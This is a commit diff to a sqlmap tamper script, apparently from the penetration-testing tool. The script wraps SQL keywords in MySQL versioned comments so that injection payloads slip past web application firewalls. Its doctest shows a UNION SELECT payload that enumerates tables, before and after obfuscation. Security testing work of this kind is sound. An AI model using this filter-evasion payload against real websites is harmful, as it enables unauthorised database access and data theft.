Update mysqlversioncomment.py

tamper/mysqlversioncomment.py

@@ -12,6 +12,9 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
+    """
+    This tamper script does not have any dependencies.
+    """
     pass
 
 def tamper(payload, **kwargs):
@@ -33,7 +36,9 @@ def tamper(payload, **kwargs):
     >>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
     '1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
     """
+
     keywords = {
+        # DML & DDL
         "SELECT": "/*!50000SELECT*/",
         "UNION": "/*!50000UNION*/",
         "INSERT": "/*!50000INSERT*/",
@@ -46,11 +51,15 @@ def tamper(payload, **kwargs):
         "LIMIT": "/*!50000LIMIT*/",
         "ALL": "/*!50000ALL*/",
         "DISTINCT": "/*!50000DISTINCT*/",
+
+        # Information Schema
         "INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
         "INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
         "TABLE_NAME": "/*!50000TABLE_NAME*/",
         "COLUMN_NAME": "/*!50000COLUMN_NAME*/",
         "TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
+
+        # Functions
         "CONCAT": "/*!50000CONCAT*/",
         "CONCAT_WS": "/*!50000CONCAT_WS*/",
         "GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
@@ -62,6 +71,8 @@ def tamper(payload, **kwargs):
         "ORD": "/*!50000ORD*/",
         "BENCHMARK": "/*!50000BENCHMARK*/",
         "SLEEP": "/*!50000SLEEP*/",
+
+        # System Information Functions
         "DATABASE()": "/*!50000DATABASE()*/",
         "USER()": "/*!50000USER()*/",
         "SESSION_USER()": "/*!50000SESSION_USER()*/",
@@ -69,6 +80,8 @@ def tamper(payload, **kwargs):
         "VERSION()": "/*!50000VERSION()*/",
         "@@VERSION": "/*!50000@@VERSION*/",
         "@@HOSTNAME": "/*!50000@@HOSTNAME*/",
+
+        # Other keywords
         "SEPARATOR": "/*!50000SEPARATOR*/",
         "HAVING": "/*!50000HAVING*/",
         "INTO": "/*!50000INTO*/",
@@ -80,13 +93,7 @@ def tamper(payload, **kwargs):
     ret_val = payload
 
     if payload:
-        sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)
+        for keyword in keywords:
+            ret_val = re.sub(r"(?i)(?<!\w)%s(?!\w)" % re.escape(keyword), keywords[keyword], ret_val)
 
-        for keyword in sorted_keywords:
+    return ret_val
-            if "()" in keyword:
-                regex_keyword = re.escape(keyword)
-                ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
-            else:
-                ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)
-
-    return ret_val